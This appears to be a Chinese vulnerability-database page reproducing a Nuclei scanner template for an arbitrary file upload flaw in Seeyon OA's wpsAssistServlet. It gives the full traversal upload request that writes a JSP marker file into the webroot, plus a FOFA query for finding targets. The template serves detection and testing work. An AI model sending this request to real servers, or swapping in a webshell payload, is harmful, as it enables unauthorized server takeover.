seeyon-oa-sp2-file-upload: Seeyon OA wpsAssistServlet - Arbitrary File Upload

日期: 2025-08-01 | 影响软件: Seeyon OA | POC: 已公开

漏洞描述

There is an arbitrary file upload vulnerability in the Seeyon OA wpsAssistServlet interface. Through the vulnerability, an attacker can send a specific request packet to upload malicious files and obtain server permissions.

PoC代码[已公开]

id: seeyon-oa-sp2-file-upload

info:
  name: Seeyon OA wpsAssistServlet - Arbitrary File Upload
  author: SleepingBag945
  severity: critical
  description: |
    There is an arbitrary file upload vulnerability in the Seeyon OA wpsAssistServlet interface. Through the vulnerability, an attacker can send a specific request packet to upload malicious files and obtain server permissions.
  reference:
    - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java
    - http://wiki.peiqi.tech/wiki/oa/致远OA/致远OA%20wpsAssistServlet%20任意文件上传漏洞.html
    - https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E8%87%B4%E8%BF%9COA%20wpsAssistServlet%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 2
    fofa-query: app="致远互联-OA" && title="V8.0SP2"
  tags: seeyon,oa,file-upload,intrusive,vuln
variables:
  filename: "{{rand_base(6)}}"
  string: "{{rand_base(5)}}"

http:
  - raw:
      - |
        POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/{{filename}}.jsp&fileId=2 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b
        Accept-Encoding: gzip

        --59229605f98b8cf290a7b8908b34616b
        Content-Disposition: form-data; name="upload"; filename="{{filename}}.xls"
        Content-Type: application/vnd.ms-excel

        <% out.println("{{string}}");%>
        --59229605f98b8cf290a7b8908b34616b--
      - |
        GET /{{filename}}.jsp HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - '"success":'

      - type: word
        part: body_2
        words:
          - '{{string}}'

      - type: status
        status:
          - 200
# digest: 4a0a0047304502207698567e21fd713bfe6067ed0be356d734d3a834785fb19fd9991d629dab1fbc02210097bb5af0f0332833d61184fc8bd2abb9cef1d64c7d50cd776cd6bc73dd366f3c:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/seeyon/seeyon-oa-sp2-file-upload.yaml

相关漏洞推荐